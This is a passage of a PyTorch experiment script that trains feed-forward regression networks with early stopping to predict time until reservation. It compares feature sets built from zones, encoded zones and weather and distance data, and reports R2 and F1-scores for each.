torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(9,128),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.002, weight_decay = 0.0001) #Chaged to Adam and learning + regulariztion rate set
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/NoZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### ADD ZONES
##################################
print('----------------------------------------------')
print('---ADD ZONES')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = weather_var + ['dist_to_station','time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(265,32),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(32,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(265,32),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(265,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### ADD ENCODED ZONES
##################################
print('----------------------------------------------')
print('---ADD ENCODED ZONES')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = weather_var + ['dist_to_station','time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
Mean_Zone_Times = dict(pd.DataFrame({'Zone': df.iloc[np.concatenate(cc[:2])].filter(regex = 'lz').idxmax(axis = 1).values, 'Time':y.iloc[np.concatenate(cc[:2])].values}).groupby('Zone').mean().squeeze())
df['Zone_E'] = df.filter(regex = 'lz').idxmax(1).map(Mean_Zone_Times)
df.drop(columns = df.filter(regex = 'lz'), inplace = True)
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(10,32),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZonesEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('(\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(10,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZonesEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('(\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(10,128),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(128,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZonesEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### ADD WEATHER AND DIST
##################################
print('----------------------------------------------')
print('---ADD WEATHER AND DIST')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = list(df_full.filter(regex = 'lz').columns) + ['time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
df['dist_to_station'] = df['dist_to_station']/5000
df[Weather_Scale.index] = (df[Weather_Scale.index] - Weather_Scale['Min'])/Weather_Scale['diff']
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(17,32),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(32,32),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(32,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0003, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithWeather.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(17,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0003, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithWeather.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(17,128),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(128,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0003, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithWeather.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
